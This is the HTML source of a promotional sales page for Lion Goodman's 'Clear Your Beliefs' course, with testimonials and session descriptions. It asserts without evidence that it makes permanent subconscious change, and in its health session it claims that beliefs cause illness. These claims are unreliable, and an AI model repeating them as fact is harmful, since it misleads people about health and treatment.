left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" 